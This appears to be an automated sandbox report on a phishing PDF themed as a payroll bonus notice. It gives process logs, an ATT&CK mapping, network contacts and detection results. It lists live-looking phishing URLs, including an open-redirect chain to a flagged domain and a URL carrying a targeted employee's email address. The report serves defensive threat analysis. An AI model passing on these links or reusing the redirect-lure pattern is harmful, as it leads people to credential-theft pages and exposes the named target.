              Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:50045 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:50050 version: TLS 1.2
              Source: classification engineClassification label: mal84.phis.troj.winPDF@60/61@29/16
              Source: Review Tempus wages bonus For 2025 Compensation Disbursement.pdfInitial sample: mailto:digit@nelsoncourt.us
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-03-04 12-25-04-719.logJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Review Tempus wages bonus For 2025 Compensation Disbursement.pdf"
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2124 --field-trial-handle=1728,i,2651444395611178824,4872869830403075443,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://ronl.org/redirect?url=https://1C.hypernesdt.ru/A86bjH/#Xesmeralda.arriaga@tempus.com
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2652 --field-trial-handle=2604,i,702203083375713400,12249269372178961096,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "http://mailto:digit@nelsoncourt.us"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2004,i,10258909886674376050,18371129370388586729,262144 /prefetch:8
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2124 --field-trial-handle=1728,i,2651444395611178824,4872869830403075443,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2652 --field-trial-handle=2604,i,702203083375713400,12249269372178961096,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2004,i,10258909886674376050,18371129370388586729,262144 /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: Review Tempus wages bonus For 2025 Compensation Disbursement.pdfInitial sample: PDF keyword /JS count = 0
              Source: Review Tempus wages bonus For 2025 Compensation Disbursement.pdfInitial sample: PDF keyword /JavaScript count = 0
              Source: A9wk6j05_93f8y8_28w.tmp.0.drInitial sample: PDF keyword /JS count = 0
              Source: A9wk6j05_93f8y8_28w.tmp.0.drInitial sample: PDF keyword /JavaScript count = 0
              Source: Review Tempus wages bonus For 2025 Compensation Disbursement.pdfInitial sample: PDF keyword /EmbeddedFile count = 0
              Source: Review Tempus wages bonus For 2025 Compensation Disbursement.pdfInitial sample: PDF keyword obj count = 53

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 4803
              Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 4803
              Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 4803
              Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 4803
              Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 4803
              Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 4803
              Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 4803
              Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 4803
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure1
              Spearphishing Link
              Windows Management Instrumentation2
              Browser Extensions
              1
              Process Injection
              1
              Masquerading
              OS Credential Dumping1
              System Information Discovery
              Remote ServicesData from Local System1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Process Injection
              LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media11
              Non-Standard Port
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging1
              Ingress Tool Transfer
              Scheduled TransferData Encrypted for Impact
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1629440 Sample: Review Tempus wages bonus F... Startdate: 04/03/2025 Architecture: WINDOWS Score: 84 24 x1.i.lencr.org 2->24 26 www.google.com 2->26 28 3 other IPs or domains 2->28 48 Antivirus detection for URL or domain 2->48 50 Yara detected Obfuscation Via HangulCharacter 2->50 52 Yara detected Invisible JS 2->52 54 4 other signatures 2->54 8 chrome.exe 2->8         started        11 Acrobat.exe 18 71 2->11         started        13 chrome.exe 1 2->13         started        signatures3 process4 dnsIp5 30 192.168.2.6, 443, 4803, 49177 unknown unknown 8->30 32 239.255.255.250 unknown Reserved 8->32 15 chrome.exe 8->15         started        18 AcroCEF.exe 106 11->18         started        20 chrome.exe 13->20         started        process6 dnsIp7 34 1c.hypernesdt.ru 188.114.96.3, 443, 49719 CLOUDFLARENETUS European Union 15->34 36 www.google.com 172.217.16.196, 443, 49738 GOOGLEUS United States 15->36 46 8 other IPs or domains 15->46 38 e8652.dscx.akamaiedge.net 92.123.17.129, 49763, 80 AKAMAI-ASUS European Union 18->38 22 AcroCEF.exe 2 18->22         started        40 nelsoncourt.us 15.197.142.173, 443, 49845, 49846 TANDEMUS United States 20->40 42 172.217.18.4, 443, 49875, 50042 GOOGLEUS United States 20->42 44 74.7.84.190, 4803, 49869, 49892 ATL-CBEYONDUS United States 20->44 process8

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://1c.hypernesdt.ru/A86bjH/100%Avira URL Cloudmalware
              http://74.7.84.190:4803/NelsonCourt0%Avira URL Cloudsafe
              https://ronl.org/redirect?url=https://1C.hypernesdt.ru/A86bjH/0%Avira URL Cloudsafe
              http://nelsoncourt.us/0%Avira URL Cloudsafe

              Download Network PCAP: filteredfull

              NameIPActiveMaliciousAntivirus DetectionReputation
              bg.microsoft.map.fastly.net
              199.232.210.172
              truefalse
                high
                e8652.dscx.akamaiedge.net
                92.123.17.129
                truefalse
                  high
                  code.jquery.com
                  151.101.194.137
                  truefalse
                    high
                    developers.cloudflare.com
                    104.16.2.189
                    truefalse
                      high
                      ronl.org
                      185.191.197.92
                      truefalse
                        unknown
                        cdnjs.cloudflare.com
                        104.17.24.14
                        truefalse
                          high
                          challenges.cloudflare.com
                          104.18.94.41
                          truefalse
                            high
                            1c.hypernesdt.ru
                            188.114.96.3
                            truetrue
                              unknown
                              nelsoncourt.us
                              15.197.142.173
                              truefalse
                                unknown
                                www.google.com
                                172.217.16.196
                                truefalse
                                  high
                                  x1.i.lencr.org
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    https://1c.hypernesdt.ru/A86bjH/#Xesmeralda.arriaga@tempus.comfalse
                                      unknown
                                      https://ronl.org/redirect?url=https://1C.hypernesdt.ru/A86bjH/false
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                        high
                                        https://1c.hypernesdt.ru/A86bjH/true
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                          high
                                          https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallbackfalse
                                            high
                                            https://developers.cloudflare.com/favicon.pngfalse
                                              high
                                              https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.jsfalse
                                                high
                                                http://74.7.84.190:4803/NelsonCourtfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://nelsoncourt.us/false
                                                • Avira URL Cloud: safe
                                                unknown
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.2.drfalse
                                                  high
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  74.7.84.190
                                                  unknownUnited States
                                                  17184ATL-CBEYONDUSfalse
                                                  185.191.197.92
                                                  ronl.orgRussian Federation
                                                  42244ESERVERRUfalse
                                                  104.18.94.41
                                                  challenges.cloudflare.comUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  15.197.142.173
                                                  nelsoncourt.usUnited States
                                                  7430TANDEMUSfalse
                                                  151.101.194.137
                                                  code.jquery.comUnited States
                                                  54113FASTLYUSfalse
                                                  104.16.2.189
                                                  developers.cloudflare.comUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  104.17.24.14
                                                  cdnjs.cloudflare.comUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  172.217.18.4
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  104.18.95.41
                                                  unknownUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  151.101.2.137
                                                  unknownUnited States
                                                  54113FASTLYUSfalse
                                                  239.255.255.250
                                                  unknownReserved
                                                  unknownunknownfalse
                                                  92.123.17.129
                                                  e8652.dscx.akamaiedge.netEuropean Union
                                                  16625AKAMAI-ASUSfalse
                                                  188.114.96.3
                                                  1c.hypernesdt.ruEuropean Union
                                                  13335CLOUDFLARENETUStrue
                                                  172.217.16.196
                                                  www.google.comUnited States
                                                  15169GOOGLEUSfalse
                                                  104.17.25.14
                                                  unknownUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  IP
                                                  192.168.2.6
                                                  Joe Sandbox version:42.0.0 Malachite
                                                  Analysis ID:1629440
                                                  Start date and time:2025-03-04 18:24:11 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 5m 41s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:defaultwindowspdfcookbook.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:14
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:Review Tempus wages bonus For 2025 Compensation Disbursement.pdf
                                                  Detection:MAL
                                                  Classification:mal84.phis.troj.winPDF@60/61@29/16
                                                  EGA Information:Failed
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 0
                                                  • Number of non-executed functions: 0
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .pdf
                                                  • Found PDF document
                                                  • Close Viewer
                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 2.19.104.203, 142.250.186.163, 142.250.185.238, 142.250.110.84, 52.22.41.97, 3.219.243.226, 3.233.129.217, 52.6.155.20, 142.250.184.238, 162.159.61.3, 172.64.41.3, 142.250.186.174, 142.250.185.142, 2.19.11.121, 2.19.11.122, 2.23.244.205, 199.232.210.172, 23.52.56.216, 142.250.65.174, 142.250.185.227, 142.250.184.206, 142.251.168.84, 216.58.206.78, 142.250.186.106, 216.58.206.74, 142.250.186.170, 142.250.186.138, 172.217.16.202, 142.250.184.202, 142.250.186.42, 142.250.186.74, 172.217.18.10, 172.217.18.106, 142.250.185.138, 172.217.16.138, 142.251.13.95, 142.250.185.74, 142.250.184.234, 142.250.185.106, 172.217.18.14, 142.250.181.238, 142.250.186.110, 172.217.18.3, 142.250.185.174, 142.250.186.142, 13.107.246.60, 2.16.185.191, 20.109.210.53
                                                  • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, clientservices.googleapis.com, acroipm2.adobe.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, update.googleapis.com, wu-b-net.trafficmanager.net, optimizationguide-pa.googleapis.com, clients1.google.com, client.wns.windows.com, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, edgedl.me.gvt1.com, armmf.adobe.com, clients.l.google.com, geo2.adobe.com
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  TimeTypeDescription
                                                  12:25:15API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                                  SourceURL
                                                  Screenshothttps://ronl.org/redirect?url=https://1C.hypernesdt.ru/A86bjH/#Xesmeralda.arriaga@tempus.com
                                                  Screenshothttps://ronl.org/redirect?url=https://1C.hypernesdt.ru/A86bjH/#Xesmeralda.arriaga@tempus.com
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  185.191.197.92https://www.ronl.ru/redirect?url=https://pub-587628e1416a4176a0229c5d120cb1f9.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                    https://ronl.org/redirect?url=http%3A%2F%2Fsnow.com.au/wl4Rlsona8Danga0Tnor1mConrosE5QfulB4grl4Rgh1mCa8D9vKoy45Get hashmaliciousUnknownBrowse
                                                      104.18.94.41Brother_MSG-voice04-45.htmlGet hashmaliciousHTMLPhisher, Invisible JSBrowse
                                                        https://buildersstoneandmasonry-my.sharepoint.com/:f:/g/personal/jorge_gardea_bsmmasonry_com/EkCNZ7HjuJVKu9OpHjDIlOIBJfNwCCSJGs6Pfb7Nsr0A4w?e=wVXyMFGet hashmaliciousHTMLPhisherBrowse
                                                          https://sumivida.com/wp-content/XXOXO/roni.htmlGet hashmaliciousHTMLPhisherBrowse
                                                            https://lindsaycars.umbraceleste.de/65cR9Get hashmaliciousHTMLPhisherBrowse
                                                              https://u17619131.ct.sendgrid.net/ls/click?upn=u001.K4JG8nMHUnY4dRjj5Gz2059XVFXFIrnWLkNOa48QpNkePjB9UEwCrB0pZbGGz5iQ9xyopT09eSDxdjqwTZGWel0BOSlYq8xO0sXSBK-2B3a8YLvf9I6p3hungARyg6yR2l7X4YLfyuEEIwqXWK-2BScLLd6I8bHWLMY1137j1m5OeKg-3Dx7vT_4ZdaYlkF5S9DQsM5Svyg9ZtG2e83A-2FNza0WD-2FFusBsUQ7ZeZcnmy7DS97Si8FHdBVbvhCkgCz1A6Sf6WLCURa1VKP9-2FY1zA4MHKSTf9wcfKXM2NTolh1P2-2BUy3bCCteVjNKMZ-2F7c3BA01Q9-2BGCSpy9BTMIW255AdUlcvBkKLBWUD-2FMVJ0-2BHOfQ9mX9YxmDgFXUAKSPAVk1UhKZexOBLYvQ-3D-3DGet hashmaliciousHTMLPhisher, Invisible JSBrowse
                                                                https://docsend.com/view/ewqm4kicbq7iqnd8Get hashmaliciousUnknownBrowse
                                                                  https://bxzbxg8ymg5ncind7ucxad85ncnwx.brewskilabz.com/Get hashmaliciousUnknownBrowse
                                                                    https://hiiudvt8z.awbpartners.com.au/?yxbe=Y2Fyb2x5bi5tLndldHRlcmxpbkB4Y2VsZW5lcmd5LmNvbQ==Get hashmaliciousUnknownBrowse
                                                                      Qvc_MSG-voice0445.htmlGet hashmaliciousHTMLPhisher, Invisible JSBrowse
                                                                        https://gamma.app/docs/-as20od50yzeyta3?mode=present#card-gq8vz6qalc06dt6Get hashmaliciousHTMLPhisherBrowse
                                                                          15.197.142.173RyJhC2oYnM.exeGet hashmaliciousPonyBrowse
                                                                          • abemoussa.com/forum/viewtopic.php
                                                                          236236236.elfGet hashmaliciousUnknownBrowse
                                                                          • steptherapyinfo.net/
                                                                          firmware.armv5l.elfGet hashmaliciousUnknownBrowse
                                                                          • 15.197.142.173/
                                                                          7qBBKk0P4l.exeGet hashmaliciousUnknownBrowse
                                                                          • womanbelieve.net/index.php
                                                                          mtuXDnH1Di.exeGet hashmaliciousUnknownBrowse
                                                                          • womanbelieve.net/index.php
                                                                          7qBBKk0P4l.exeGet hashmaliciousUnknownBrowse
                                                                          • womanbelieve.net/index.php
                                                                          mtuXDnH1Di.exeGet hashmaliciousUnknownBrowse
                                                                          • womanbelieve.net/index.php
                                                                          vzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                          • womanbelieve.net/index.php
                                                                          vzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                          • womanbelieve.net/index.php
                                                                          http://www.acproyectosdeingenieria.comGet hashmaliciousUnknownBrowse
                                                                          • www.acproyectosdeingenieria.com/
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          code.jquery.comBrother_MSG-voice04-45.htmlGet hashmaliciousHTMLPhisher, Invisible JSBrowse
                                                                          • 151.101.66.137
                                                                          https://buildersstoneandmasonry-my.sharepoint.com/:f:/g/personal/jorge_gardea_bsmmasonry_com/EkCNZ7HjuJVKu9OpHjDIlOIBJfNwCCSJGs6Pfb7Nsr0A4w?e=wVXyMFGet hashmaliciousHTMLPhisherBrowse
                                                                          • 151.101.130.137
                                                                          https://sumivida.com/wp-content/XXOXO/roni.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                          • 151.101.66.137
                                                                          https://tremeautouniversalluxury.docvaulthost.com/9WSTO/Get hashmaliciousUnknownBrowse
                                                                          • 151.101.2.137
                                                                          https://lindsaycars.umbraceleste.de/65cR9Get hashmaliciousHTMLPhisherBrowse
                                                                          • 151.101.130.137
                                                                          Your Capital One Account Restricted...pdfGet hashmaliciousHTMLPhisherBrowse
                                                                          • 151.101.2.137
                                                                          https://u17619131.ct.sendgrid.net/ls/click?upn=u001.K4JG8nMHUnY4dRjj5Gz2059XVFXFIrnWLkNOa48QpNkePjB9UEwCrB0pZbGGz5iQ9xyopT09eSDxdjqwTZGWel0BOSlYq8xO0sXSBK-2B3a8YLvf9I6p3hungARyg6yR2l7X4YLfyuEEIwqXWK-2BScLLd6I8bHWLMY1137j1m5OeKg-3Dx7vT_4ZdaYlkF5S9DQsM5Svyg9ZtG2e83A-2FNza0WD-2FFusBsUQ7ZeZcnmy7DS97Si8FHdBVbvhCkgCz1A6Sf6WLCURa1VKP9-2FY1zA4MHKSTf9wcfKXM2NTolh1P2-2BUy3bCCteVjNKMZ-2F7c3BA01Q9-2BGCSpy9BTMIW255AdUlcvBkKLBWUD-2FMVJ0-2BHOfQ9mX9YxmDgFXUAKSPAVk1UhKZexOBLYvQ-3D-3DGet hashmaliciousHTMLPhisher, Invisible JSBrowse
                                                                          • 151.101.194.137
                                                                          https://aircarecolorado.com/locations/van-locations?tab=jl_magic_tabs_m_th_current_week_gix1Get hashmaliciousUnknownBrowse
                                                                          • 151.101.130.137
